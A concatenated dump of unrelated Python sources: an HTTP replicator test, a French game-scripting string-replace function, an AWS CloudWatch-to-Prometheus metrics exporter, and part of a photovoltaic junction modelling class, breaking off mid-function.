                                     self.SAMPLE_OP_INFOS, {"X-API-Key": "abcdef123"}, False)
        self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
        self.assertIn(mock.call(url='https://server.de/pet/0/uploadImage', headers={"X-API-Key": "abcdef123"}),
                      mock_delete.call_args_list)
    @patch('requests.put', side_effect=mock_request_put)
    def test_execute_will_put_op_request_with_url_and_params_when_form_data_param_set(self, mock_put):
        # PUT carries the formData params in the body (data=...).
        self.http_op = HttpOperation('put', 'https://server.de/', 'pet/{petId}/uploadImage',
                                     self.SAMPLE_OP_INFOS, {"X-API-Key": "abcdef123"}, False)
        self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
        self.assertIn(mock.call(data={'status': '', 'name': ''}, headers={"X-API-Key": "abcdef123"},
                                url='https://server.de/pet/0/uploadImage'), mock_put.call_args_list)
992,147 | da26d6bb422c06c66c887601abfb5cc88ed7351f | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant la fonction remplacer."""
from primaires.scripting.fonction import Fonction
from primaires.scripting.instruction import ErreurExecution
class ClasseFonction(Fonction):
    """Remplace un morceau de chaîne par une autre."""
    # NOTE(review): docstrings in this scripting framework appear to double
    # as in-game help text shown to builders, so they are kept in French.
    # English summary: scripting function `remplacer` — replace every
    # occurrence of a substring in a string (case/accents-sensitive).
    @classmethod
    def init_types(cls):
        # Register the single accepted signature: remplacer(str, str, str).
        cls.ajouter_types(cls.remplacer, "str", "str", "str")
    @staticmethod
    def remplacer(origine, recherche, remplacement):
        """Remplace une partie de la chaîne indiquée.
        Paramètres à préciser :
          * origine : la chaîne d'origine, celle qui sera modifiée
          * recherche : la chaîne à rechercher
          * remplacement : la chaîne qui doit remplacer la recherche
        Exemple d'utilisation :
          chaine = "C'est une phrase contenant le mot pigeon."
          chaine = remplacer(chaine, "pigeon", "carad")
          # 'chaine' contient à présent
          # "C'est une phrase contenant le mot canard."
        La partie à remplacer peut se trouver n'importe où dans la
        chaîne, au début, milieu ou à la fin. Elle peut se trouver
        plusieurs fois. La recherche est sensible aux majuscules
        et accents.
        """
        # Plain case-sensitive replacement of every occurrence.
        return origine.replace(recherche, remplacement)
|
992,148 | b487bf9ebc81fb0ccda4bb4d990ce890ce9ac724 | #!/usr/bin/python3
"""
===============
cwexport module
===============
Module for exporting cloudwatch metrics to a pure text Prometheus exposition format
To DocTest: python3 cwexporter.py -v
Example usage:
>>> region='us-east-1'
>>> namespace='AWS/EC2'
>>> type(listmetrics(Region_name=region, namespace=namespace))
<class 'list'>
>>> type(generate_metrics_querys(listmetrics(Region_name=region, namespace=namespace)))
<class 'tuple'>
>>> a, b = generate_metrics_querys(listmetrics(Region_name=region, namespace=namespace))
>>> type(a)
<class 'list'>
>>> type(b)
<class 'dict'>
>>> r=(generate_metrics_data(a,b, Region_name=region))
>>> type(r)
<class 'dict'>
>>> 'ApiCalls' in r.keys()
True
>>> type(r['ApiCalls'])
<class 'int'>
>>> r['ApiCalls']>=1
True
"""
import os
import sys
if 'LAMBDA_TASK_ROOT' in os.environ:
"Checking if we are running in a Lambda environment. This is needed in order to import the local boto3 version (1.9.129)."
envLambdaTaskRoot = os.environ["LAMBDA_TASK_ROOT"]
print("LAMBDA_TASK_ROOT env var:"+os.environ["LAMBDA_TASK_ROOT"])
print("sys.path:"+str(sys.path))
sys.path.insert(0,envLambdaTaskRoot)
import string
from boto3 import client #type: ignore
from datetime import datetime, timedelta
from collections import defaultdict
from itertools import zip_longest
from random import choice
from typing import List, Dict, Tuple, DefaultDict, Iterable, Any
def randomString(stringLength: int = 10) -> str:
    """Return a random lowercase-ASCII string of the requested length.

    >>> type(randomString(15))
    <class 'str'>
    >>> len(randomString(15))
    15
    """
    alphabet = string.ascii_lowercase
    return ''.join(choice(alphabet) for _ in range(stringLength))
def listmetrics(namespace: str = None, Region_name: str = None) -> List:
    """List CloudWatch metrics for a region, optionally for one namespace.

    >>> type(listmetrics(Region_name="us-east-1", namespace="AWS/EC2"))
    <class 'list'>
    """
    cloudwatch = client('cloudwatch', region_name=Region_name)
    paginator = cloudwatch.get_paginator('list_metrics')
    if namespace is not None:
        pages = paginator.paginate(Namespace=namespace)
    else:
        pages = paginator.paginate()
    metrics = []  # type: List
    for response in pages:
        # flatten every page's 'Metrics' list into one result
        metrics.extend(response['Metrics'])
    return metrics
def generate_metrics_querys(metrics: List, period: int = 30, stats: str = 'Sum') -> Tuple[List, Dict]:
    """Build MetricDataQueries plus an id->query lookup for a metric list.

    The random Id is needed to later co-relate each query with its result.

    >>> a=(generate_metrics_querys(listmetrics(Region_name="us-east-1", namespace="AWS/EC2")))
    >>> type(a)
    <class 'tuple'>
    >>> len(a)==2
    True
    """
    metricsquery = []  # type: List
    resultsquery = defaultdict(list)  # type: DefaultDict
    for metric in metrics:
        query_id = randomString()
        stat_spec = {'Metric': metric, 'Period': period, 'Stat': stats}
        # two shallow copies so the entries stay independent objects
        metricsquery.append({'Id': query_id, 'MetricStat': dict(stat_spec)})
        resultsquery[query_id].append({'query': {'MetricStat': dict(stat_spec)}})
    return metricsquery, dict(resultsquery)
def generate_metrics_data(metricsquery: List, resultsquery: Dict, deltaminutes: int = 5, Region_name: str = None) -> Dict:
    """Get the metrics data from the Cloudwatch GetMetricData API calls and append it to the resultsquery dictionary by their ID. Store the number of API Calls in the key ApiCalls for statistics

    Mutates and returns *resultsquery*.  Queries are chunked by grouper()
    (100 per call, the GetMetricData limit).  Assumes every result Id already
    has an entry in resultsquery (as built by generate_metrics_querys) —
    a missing Id would raise KeyError.

    >>> a=generate_metrics_querys(listmetrics(Region_name="us-east-1", namespace="AWS/EC2"))
    >>> d=generate_metrics_data(a[0],a[1],Region_name="us-east-1")
    >>> type(d)
    <class 'dict'>
    >>> len(d)>=1
    True
    """
    cloudwatch=client('cloudwatch', region_name=Region_name)
    paginator = cloudwatch.get_paginator('get_metric_data')
    metricsgroup=grouper(metricsquery)
    resultsquery['ApiCalls']=0
    for mqs in metricsgroup:
        # look back deltaminutes from "now" for each chunk
        for response in paginator.paginate(MetricDataQueries=mqs, StartTime=datetime.now()-timedelta(minutes=deltaminutes),EndTime=datetime.now()):
            for results in response['MetricDataResults']:
                resultsquery[results['Id']].append({'results':results})
            resultsquery['ApiCalls']+=1
    return resultsquery
def zip_discard_compr(*iterables: Iterable, sentinel: Any = object()) -> Any:
    """Zip iterables into groups, dropping the padding sentinel values.

    >>> args=[iter('ABCDEFGHIJLMNOPQ')] * 5
    >>> zip_discard_compr(*args)
    [['A', 'B', 'C', 'D', 'E'], ['F', 'G', 'H', 'I', 'J'], ['L', 'M', 'N', 'O', 'P'], ['Q']]
    """
    grouped = []
    for chunk in zip_longest(*iterables, fillvalue=sentinel):
        # identity check: only the exact sentinel object is discarded
        grouped.append([item for item in chunk if item is not sentinel])
    return grouped
def grouper(iterable: Iterable, n: int = 100, fillvalue: Any = None) -> Any:
    """Split *iterable* into chunks of at most *n* items.

    100 is the GetMetricData limit of queries per call.  *fillvalue* is
    accepted for API compatibility but unused (padding is discarded).

    >>> grouper('ABCDEFG', 3)
    [['A', 'B', 'C'], ['D', 'E', 'F'], ['G']]
    """
    repeated_iter = [iter(iterable)] * n
    return zip_discard_compr(*repeated_iter)
def formater(resultsquery: Dict) -> List:
    """Return Prometheus exposition lines from GetMetricData responses.

    (NOTE: the doctest below depends on the local timezone, since
    datetime.timestamp() converts local naive datetimes.)

    >>> test=dict()
    >>> test['lvrqciqeoe']=[{'query': {'MetricStat': {'Metric': {'Namespace': 'AWS/EC2', 'MetricName': 'StatusCheckFailed_System', 'Dimensions': [{'Name': 'InstanceId', 'Value': 'i-0747590f4f554184a'}]}, 'Period': 30, 'Stat': 'Sum'}}}, {'results': {'Id': 'lvrqciqeoe', 'Label': 'StatusCheckFailed_System', 'Timestamps': [datetime(2019, 4, 5, 16, 25), datetime(2019, 4, 5, 16, 24), datetime(2019, 4, 5, 16, 23), datetime(2019, 4, 5, 16, 22)], 'Values': [0.0, 0.0, 0.0, 0.0], 'StatusCode': 'Complete'}}]
    >>> formater(test)
    ['StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481500.0', 'StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481440.0', 'StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481380.0', 'StatusCheckFailed_System{Namespace="AWS/EC2", InstanceId="i-0747590f4f554184a"} 0.0 1554481320.0']
    """
    formattedresults = []  # type: List
    for query_id, values in resultsquery.items():
        if not isinstance(values, list):
            continue  # skip bookkeeping entries such as the 'ApiCalls' int
        headstring = ''  # 'metric{Namespace="..."' — set by the 'query' entry
        body = ''        # extra dimension labels, accumulated per identity
        for entry in values:
            if 'query' in entry:
                metric = entry['query']['MetricStat']['Metric']
                metricname = metric['MetricName']
                namespace = metric['Namespace']
                headstring = f'{metricname}{{Namespace="{namespace}"'
                dimensions = metric['Dimensions']
                if isinstance(dimensions, list) and len(dimensions) >= 1:
                    for dim in dimensions:
                        body += f', {dim["Name"]}="{dim["Value"]}"'
            if 'results' in entry:
                # fix: headstring is now pre-initialized, so a 'results'
                # entry arriving before its 'query' no longer raises
                # NameError (original referenced it before assignment).
                datapoints = entry['results']['Values']
                timestamps = entry['results']['Timestamps']
                if isinstance(datapoints, list) and len(datapoints) >= 1:
                    # one exposition line per datapoint: value + epoch time
                    for data, when in zip(datapoints, timestamps):
                        formattedresults.append(
                            headstring + body + f'}} {data} {when.timestamp()}')
                else:
                    # metric exists but returned no datapoints
                    formattedresults.append(headstring + body + '} ')
    return formattedresults
if __name__ == "__main__":
    # Run the module's doctests when executed directly (see module docstring).
    import doctest
    doctest.testmod()
|
992,149 | ddeb81c46b60d5f8aea5e274dbc3748a806e0b64 | # -*- coding: utf-8 -*-
"""
This is the PVcircuit Package.
pvcircuit.Junction() # properties and methods for each junction
"""
import math #simple math
import copy
import os
from time import time
from datetime import datetime
from functools import lru_cache
import numpy as np #arrays
import pandas as pd
import matplotlib.pyplot as plt #plotting
from parse import *
from scipy.optimize import brentq #root finder
#from scipy.special import lambertw, gammaincc, gamma #special functions
import scipy.constants as con #physical constants
import ipywidgets as widgets
from IPython.display import display
# constants
k_q = con.k/con.e
DB_PREFIX = 2. * np.pi * con.e * (con.k/con.h)**3 / (con.c)**2 /1.e4 #about 1.0133e-8 for Jdb[A/cm2]
nan=np.nan
# Junction defaults
Eg_DEFAULT=1.1 #[eV]
TC_REF=25.0 #[C]
AREA_DEFAULT = 1. #[cm2] note: if A=1, then I->J
BETA_DEFAUlT = 15. # unitless
# numerical calculation parameters
VLIM_REVERSE=10.
VLIM_FORWARD=3.
VTOL= 0.0001
EPSREL=1e-15
MAXITER=1000
GITpath = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
@lru_cache(maxsize = 100)
def TK(TC):
    """Convert a temperature from degrees Celsius to kelvin."""
    return con.zero_Celsius + TC
@lru_cache(maxsize = 100)
def Vth(TC):
    """Thermal voltage kT/q [V] at temperature TC [degrees C]."""
    return k_q * TK(TC)
@lru_cache(maxsize = 100)
def Jdb(TC, Eg):
    """Detailed-balance saturation current for band gap Eg [eV] at TC [C].

    Implements Jdb from Geisz et al.; units follow DB_PREFIX (A/cm2).
    """
    reduced_gap = Eg / Vth(TC)  # band gap in thermal-voltage units, Eg/kT
    polynomial = reduced_gap * reduced_gap + 2. * reduced_gap + 2.
    return DB_PREFIX * TK(TC)**3. * polynomial * np.exp(-reduced_gap)
def timestamp(fmt="%y%m%d-%H%M%S",tm=None):
    """Return local time *tm* (epoch seconds; default: now) formatted with *fmt*."""
    if tm is None:  # fix: 'is None' instead of '== None' (PEP 8; identity test)
        tm = time()
    date_time = datetime.fromtimestamp(tm)
    return date_time.strftime(fmt)
def newoutpath(dname=None):
    """Create and return a new output directory under <git root>/pvc_output.

    The folder name is *dname* + a timestamp (timestamp alone when *dname*
    is None).  Returns None when GITpath does not exist — this preserves the
    original's implicit-None behaviour in that case, now made explicit.
    """
    if not os.path.exists(GITpath):
        return None
    pvcoutpath = os.path.join(GITpath, 'pvc_output')
    if dname is None:  # fix: 'is None' instead of '== None'
        dname = timestamp()
    else:
        dname += timestamp()
    newpath = os.path.join(pvcoutpath, dname)
    # makedirs also creates pvc_output itself when missing (no-op otherwise)
    os.makedirs(newpath, exist_ok=True)
    return newpath
class Junction(object):
"""
Class for PV junctions.
:param Rs: series resistance [ohms]
"""
ATTR = ['Eg','TC','Gsh','Rser','lightarea','totalarea','Jext','JLC','beta','gamma','pn'
,'Jphoto','TK','Jdb']
ARY_ATTR = ['n','J0ratio','J0']
J0scale = 1000. # mA same as Igor, changes J0ratio because of units
    def __init__(self, name='junc', Eg=Eg_DEFAULT, TC=TC_REF, \
                Gsh=0., Rser=0., area=AREA_DEFAULT, \
                n=[1.,2.], J0ratio=None, J0ref=None, \
                RBB=None, Jext=0.04, JLC=0., J0default=10., \
                pn=-1, beta=BETA_DEFAUlT, gamma=0. ):
        # NOTE(review): n=[1.,2.] is a mutable default argument; it is only
        # read here (len / np.array), so it is harmless, but callers should
        # not rely on mutating it.
        self.ui = None
        self.debugout = widgets.Output() # debug output
        self.RBB_dict = {}
        # user inputs
        self.name = name # remember my name
        self.Eg = np.float64(Eg) #: [eV] junction band gap
        self.TC = np.float64(TC) #: [C] junction temperature
        self.Jext = np.float64(Jext) #: [A/cm2] photocurrent density
        self.Gsh = np.float64(Gsh) #: [mho] shunt conductance=1/Rsh
        self.Rser = np.float64(Rser) #: [ohm] series resistance
        self.lightarea = np.float64(area) # [cm2] illuminated junction area
        self.totalarea = np.float64(area) # [cm2] total junction area including shaded areas
        #used for tandems only
        self.pn = int(pn) # p-on-n=1 or n-on-p=-1
        self.beta = np.float64(beta) # LC parameter
        self.gamma = np.float64(gamma) # PL parameter from Lan
        self.JLC = np.float64(JLC) # LC current from other cell JLC=beta(this)*Jem(other)
        # multiple diodes
        # n=1 bulk, n=m SNS, and n=2/3 Auger mechanisms
        ndiodes=len(n)
        self.n = np.array(n) #diode ideality list e.g. [n0, n1]
        # J0ref (absolute J0 values) wins over J0ratio (relative values);
        # on any length mismatch both fall back to a uniform J0default.
        if J0ref: #input list of absolute J0
            if len(J0ref) == ndiodes: #check length
                self._J0init(J0ref) # calculate self.J0ratio from J0ref at current self.TC
            else:
                print("J0ref mismatch", ndiodes, len(J0ref))
                self.J0ratio = np.full_like(n,J0default) #default J0ratio
        elif J0ratio: #input list of relative J0 ratios
            if len(J0ratio) == ndiodes: #check length
                self.J0ratio = np.array(J0ratio) #diode J0/Jdb^(1/n) ratio list for T dependence
            else:
                print("J0ratio mismatch", ndiodes, len(J0ratio))
                self.J0ratio = np.full_like(n,J0default) #default J0ratio
        else: #create J0ratio
            self.J0ratio = np.full_like(n,J0default) #default J0ratio
        # set() also normalizes the RBB shortcut into self.RBB_dict
        self.set(RBB=RBB)
def copy(self):
'''
create a copy of a Junction
need deepcopy() to separate lists, dicts, etc but crashes
'''
tmp = copy.copy(self)
# manual since deepcopy does not work
tmp.n = self.n.copy()
tmp.J0ratio = self.J0ratio.copy()
tmp.RBB_dict = self.RBB_dict.copy()
return tmp
def __str__(self):
#attr_list = self.__dict__.keys()
#attr_dict = self.__dict__.items()
#print(attr_list)
strout = self.name+": <pvcircuit.junction.Junction class>"
strout += '\nEg = {0:.2f} eV, TC = {1:.1f} C' \
.format(self.Eg, self.TC)
strout += '\nJext = {0:.1f} , JLC = {1:.1f} mA/cm2' \
.format( self.Jext*1000., self.JLC*1000.)
strout += '\nGsh = {0:g} S/cm2, Rser = {1:g} Ωcm2' \
.format(self.Gsh, self.Rser)
strout += '\nlightA = {0:g} cm2, totalA = {1:g} cm2' \
.format(self.lightarea, self.totalarea)
strout += '\npn = {0:d}, beta = {1:g}, gamma = {2:g}' \
.format(self.pn, self.beta, self.gamma, self.JLC)
strout += '\n {0:^5s} {1:^10s} {2:^10s}' \
.format('n','J0ratio', 'J0(A/cm2)')
strout += '\n {0:^5s} {1:^10.0f} {2:^10.3e}' \
.format('db', 1., self.Jdb)
i=0
for ideality_factor,ratio, saturation_current in zip(self.n, self.J0ratio, self.J0):
strout += '\n {0:^5.2f} {1:^10.2f} {2:^10.3e}' \
.format(self.n[i], self.J0ratio[i], self.J0[i])
i+=1
if self.RBB_dict['method'] :
strout+=' \nRBB_dict: '+str(self.RBB_dict)
return strout
def __repr__(self):
return str(self)
'''
def __setattr__(self, key, value):
# causes problems
super(Junction, self).__setattr__(key, value)
self.set(key = value)
'''
    def update(self):
        """Push current Junction attribute values into the ipywidgets UI.

        For each control, the description string is parsed: plain names map
        to scalar ATTR attributes, 'name[i]' maps to element i of an
        ARY_ATTR array, and RBB_dict keys map to the RBB controls.  Controls
        are only written when the value actually changed, to avoid
        re-triggering observers.
        """
        # update Junction self.ui controls
        if self.ui: # junction user interface has been created
            # NOTE(review): RBB_keys is only assigned when self.RBB_dict is
            # truthy; set() always populates RBB_dict, but if it were ever
            # empty the 'key in RBB_keys' test below would raise NameError.
            if self.RBB_dict:
                if self.RBB_dict['method']:
                    RBB_keys = list(self.RBB_dict.keys())
                else:
                    RBB_keys = []
            cntrls = self.ui.children
            for cntrl in cntrls:
                desc = cntrl._trait_values.get('description','nodesc') # control description
                cval = cntrl._trait_values.get('value','noval') # control value
                if desc == 'nodesc' or cval == 'noval':
                    break
                elif desc.endswith(']') and desc.find('[') > 0 :
                    # array-style control, e.g. 'n[0]' -> ('n', 0)
                    key, ind = parse('{}[{:d}]',desc)
                else:
                    key = desc
                    ind = None
                if key in self.ATTR: # Junction scalar controls to update
                    attrval = getattr(self, key) # current value of attribute
                    if cval != attrval:
                        with self.debugout: print('Jupdate: ' + desc, attrval)
                        cntrl.value = attrval
                elif key in self.ARY_ATTR: # Junction array controls to update
                    attrval = getattr(self, key) # current value of attribute
                    if type(ind) is int:
                        if type(attrval) is np.ndarray:
                            if cval != attrval[ind]:
                                with self.debugout: print('Jupdate: ' + desc, attrval[ind])
                                cntrl.value = attrval[ind]
                elif key in RBB_keys:
                    attrval = self.RBB_dict[key]
                    if cval != attrval:
                        with self.debugout: print('Jupdate: ' + desc, attrval)
                        cntrl.value = attrval
    def set(self, **kwargs):
        """Controlled update of Junction attributes from keyword arguments.

        Accepted keys: 'RBB'/'method' (RBB shortcut strings 'JFG'/'bishop'),
        individual RBB_dict keys, 'area' (sets both lightarea and totalarea),
        'name', 'pn', 'RBB_dict', the array attributes 'n'/'J0ratio'
        (whole array, or one element via 'n[0]' syntax), and any scalar in
        self.ATTR.  Writes go through self.__dict__ directly.
        """
        # controlled update of Junction attributes
        with self.debugout: print('Jset('+self.name+'): ', list(kwargs.keys()))
        for testkey, value in kwargs.items():
            if testkey.endswith(']') and testkey.find('[') > 0 :
                key, ind = parse('{}[{:d}]',testkey) #set one element of array e.g. 'n[0]'
            else:
                key = testkey
                ind = None
            # NOTE(review): RBB_keys stays unbound if RBB_dict is ever empty
            # here (it is set in __init__, so in practice it is truthy).
            if self.RBB_dict:
                if self.RBB_dict['method']:
                    RBB_keys = list(self.RBB_dict.keys())
                else:
                    RBB_keys = []
            if key == 'RBB' or key == 'method':
                # this change requires redrawing self.ui
                if value == 'JFG': # RBB shortcut
                    self.__dict__['RBB_dict'] = {'method':'JFG', 'mrb':10., 'J0rb':0.5, 'Vrb':0.}
                elif value == 'bishop':
                    self.__dict__['RBB_dict'] = {'method':'bishop','mrb':3.28, 'avalanche':1., 'Vrb':-5.5}
                else:
                    self.__dict__['RBB_dict'] = {'method': None} #no RBB
                if self.ui: # junction user interface has been created
                    #ui = self.controls() # redraw junction controls
                    pass
            elif key in RBB_keys: #RBB parameters
                self.RBB_dict[key] = np.float64(value)
            elif key == 'area': # area shortcut
                self.__dict__['lightarea'] = np.float64(value)
                self.__dict__['totalarea'] = np.float64(value)
            elif key == 'name': # strings
                self.__dict__[key] = str(value)
            elif key == 'pn': # integers
                self.__dict__[key] = int(value)
            elif key == 'RBB_dict':
                self.__dict__[key] = value
            elif key in ['n','J0ratio']: # diode parameters (array)
                if type(ind) is int and np.isscalar(value) :
                    # single-element write: copy, modify, re-assign
                    attrval = getattr(self, key) # current value of attribute
                    localarray = attrval.copy()
                    if type(localarray) is np.ndarray:
                        if ind < localarray.size:
                            localarray[ind] = np.float64(value) #add new value
                            self.__dict__[key] = localarray
                            with self.debugout: print('scalar',key, ind, localarray)
                else:
                    self.__dict__[key] = np.array(value)
                    with self.debugout: print('array', key, value)
            elif key in self.ATTR: # scalar float
                self.__dict__[key] = np.float64(value)
                with self.debugout: print('ATTR', key, value)
            else:
                with self.debugout: print('no Junckey',key)
@property
def Jphoto(self): return self.Jext * self.lightarea / self.totalarea + self.JLC
# total photocurrent
# external illumination is distributed over total area
    @property
    def TK(self):
        """Junction temperature in kelvin (from self.TC in Celsius)."""
        return TK(self.TC)
    @property
    def Vth(self):
        """Thermal voltage kT/q [V] at the junction temperature."""
        return Vth(self.TC)
    @property
    def Jdb(self):
        """Detailed-balance saturation current at (self.TC, self.Eg)."""
        return Jdb(self.TC, self.Eg)
@property
def J0(self):
#dynamically calculated J0(T)
#return np.ndarray [J0(n0), J0(n1), etc]
if (type(self.n) is np.ndarray) and (type(self.J0ratio) is np.ndarray):
if self.n.size == self.J0ratio.size:
return (self.Jdb * self.J0scale)**(1./self.n) * self.J0ratio / self.J0scale
else:
return np.nan # different sizes
else:
return np.nan # not numpy.ndarray
def _J0init(self,J0ref):
'''
initialize self.J0ratio from J0ref
return np.ndarray [J0(n0), J0(n1), etc]
'''
J0ref = np.array(J0ref)
if (type(self.n) is np.ndarray) and (type(J0ref) is np.ndarray):
if self.n.size == J0ref.size:
self.J0ratio = self.J0scale * J0ref / (self.Jdb * self.J0scale)**(1./self.n)
return 0 # success
else:
return 1 # different sizes
else:
return 2 # not numpy.ndarray
def Jem(self,Vmid):
'''
light emitted from junction by reciprocity
quantified as current density
'''
if Vmid > 0.:
Jem = self.Jdb * (np.exp(Vmid / self.Vth) - 1.) # EL Rau
Jem += self.gamma * self.Jphoto # PL Lan and Green
return Jem
else:
return 0.
def notdiode(self):
'''
is this junction really a diode
or just a resistor
sum(J0) = 0 -> not diode
pn = 0 -> not diode
'''
if self.pn == 0:
return True
jsum = np.float64(0.)
for saturation_current in self.J0:
jsum +=saturation_current
return (jsum == np.float64(0.))
def Jmultidiodes(self,Vdiode):
'''
calculate recombination current density from
multiple diodes self.n, self.J0 numpy.ndarray
two-diodes:
n = [1, 2] #two diodes
J0 = [10,10] #poor cell
detailed balance:
n = [1]
J0 = [1]
three-diodes
n = [1, 1.8, (2/3)]
'''
Jrec = np.float64(0.)
for ideality_factor, saturation_current in zip(self.n, self.J0):
if ideality_factor>0. and math.isfinite(saturation_current):
try:
Jrec += saturation_current \
* (np.exp(Vdiode / self.Vth / ideality_factor) - 1.)
except:
continue
return Jrec
    def JshuntRBB(self, Vdiode):
        '''
        return shunt + reverse-bias breakdown current

        Supported self.RBB_dict shapes:
        RBB_dict={'method':None}  # no RBB, shunt only
        RBB_dict={'method':'JFG', 'mrb':10., 'J0rb':1., 'Vrb':0.}
        RBB_dict={'method':'bishop', 'mrb':3.28, 'avalanche':1, 'Vrb':-5.5}
        RBB_dict={'method':'pvmismatch', 'ARBD':arbd, 'BRBD':brbd, 'VRBD':vrb, 'NRBD':nrbd}
            (pvmismatch is currently a stub: contributes no RBB current)

        Vdiode is the junction voltage without the Rser drop; the ohmic
        shunt term Vdiode * Gsh is always included in the return value.
        '''
        RBB_dict = self.RBB_dict
        method=RBB_dict['method']
        JRBB=np.float64(0.)
        if method=='JFG' :
            Vrb=RBB_dict['Vrb']
            J0rb=RBB_dict['J0rb']
            mrb=RBB_dict['mrb']
            if Vdiode <= Vrb and mrb != 0. :
                #JRBB = -J0rb * (self.Jdb)**(1./mrb) * (np.exp(-Vdiode / self.Vth / mrb) - 1.0)
                # J0rb is scaled in mA units, mirroring the J0ratio convention
                JRBB = -J0rb * (self.Jdb*1000)**(1./mrb) / 1000. \
                    * (np.exp(-Vdiode / self.Vth / mrb) - 1.0)
        elif method=='bishop':
            Vrb=RBB_dict['Vrb']
            a=RBB_dict['avalanche']
            mrb=RBB_dict['mrb']
            if Vdiode <= 0. and Vrb !=0. :
                # avalanche multiplication of the shunt current (Bishop model)
                JRBB = Vdiode * self.Gsh * a * (1. - Vdiode / Vrb)**(-mrb)
        elif method=='pvmismatch':
            JRBB=np.float64(0.)
        return Vdiode * self.Gsh + JRBB
def Jparallel(self,Vdiode,Jtot):
'''
circuit equation to be zeroed to solve for Vi
for voltage across parallel diodes with shunt and reverse breakdown
'''
if self.notdiode(): # sum(J0)=0 -> no diode
return Jtot
JLED = self.Jmultidiodes(Vdiode)
JRBB = self.JshuntRBB(Vdiode)
#JRBB = JshuntRBB(Vdiode, self.Vth, self.Gsh, self.RBB_dict)
return Jtot - JLED - JRBB
    def Vdiode(self,Jdiode):
        '''
        Solve for the junction voltage at total current Jtot = Jphoto + Jdiode
        (no Rser drop included here).  Returns 0. for a non-diode junction
        and np.nan when the root finder fails.
        '''
        if self.notdiode(): # sum(J0)=0 -> no diode
            return 0.
        Jtot = self.Jphoto + Jdiode
        try:
            # NOTE(review): args=(Jtot) has no trailing comma, so it is a
            # plain scalar, not a 1-tuple — appears to work with brentq
            # here, but confirm against the scipy signature.
            Vdiode = brentq(self.Jparallel, -VLIM_REVERSE, VLIM_FORWARD, args=(Jtot),
                           xtol=VTOL, rtol=EPSREL, maxiter=MAXITER,
                           full_output=False, disp=True)
        except:
            return np.nan
            #print("Exception:",err)
        return Vdiode
def _dV(self, Vmid, Vtot):
'''
see singlejunction
circuit equation to be zeroed (returns voltage difference) to solve for Vmid
single junction circuit with series resistance and parallel diodes
'''
J = self.Jparallel(Vmid, self.Jphoto)
dV = Vtot - Vmid + J * self.Rser
return dV
    def Vmid(self,Vtot):
        '''
        Find the intermediate junction voltage of a single-junction diode
        with series resistance, given the terminal voltage
        Vtot = Vparallel + Rser * Jparallel.  Returns 0. for a non-diode
        junction and np.nan when the root finder fails.
        '''
        if self.notdiode(): # sum(J0)=0 -> no diode
            return 0.
        try:
            # NOTE(review): args=(Vtot) is a scalar, not a 1-tuple (no
            # trailing comma) — same pattern as Vdiode(); confirm it is
            # accepted by scipy's brentq.
            Vmid = brentq(self._dV, -VLIM_REVERSE, VLIM_FORWARD, args=(Vtot),
                         xtol=VTOL, rtol=EPSREL, maxiter=MAXITER,
                         full_output=False, disp=True)
        except:
            return np.nan
            #print("Exception:",err)
        return Vmid
    def controls(self):
        '''
        Build an ipywidgets control panel (VBox) for this junction and
        return it (also stored as self.ui) for interactive use in IPython.

        Every control's 'value' change is routed through one observer
        (on_juncchange) into self.set(attr=value), keeping the underlying
        junction attributes in sync with the GUI.
        '''
        cell_layout = widgets.Layout(display='inline_flex',
                    flex_flow='row',
                    justify_content='flex-end',
                    width='300px')
        # controls -- one widget per scalar attribute; descriptions must match
        # the attribute names because on_juncchange uses them as set() keys
        in_name = widgets.Text(value=self.name,description='name',layout=cell_layout,
            continuous_update=False)
        in_Eg = widgets.FloatSlider(value=self.Eg, min=0.1,max=3.0,step=0.01,
            description='Eg',layout=cell_layout,readout_format='.2f')
        in_TC = widgets.FloatSlider(value=self.TC, min=-40, max=200.,step=2,
            description='TC',layout=cell_layout,readout_format='.1f')
        in_Jext = widgets.FloatSlider(value=self.Jext, min=0., max=.080,step=0.001,
            description='Jext',layout=cell_layout,readout_format='.4f')
        # JLC is display-only (luminescent coupling is computed, not set by hand)
        in_JLC = widgets.FloatSlider(value=self.JLC, min=0., max=.080,step=0.001,
            description='JLC',layout=cell_layout,readout_format='.4f',disabled=True)
        in_Gsh = widgets.FloatLogSlider(value=self.Gsh, base=10, min=-12, max=3 ,step=0.01,
            description='Gsh',layout=cell_layout,readout_format='.2e')
        in_Rser= widgets.FloatLogSlider(value=self.Rser, base=10, min=-7, max=3, step=0.01,
            description='Rser',layout=cell_layout,readout_format='.2e')
        in_lightarea = widgets.FloatLogSlider(value=self.lightarea, base=10, min=-6, max=3.,step=0.1,
            description='lightarea',layout=cell_layout)
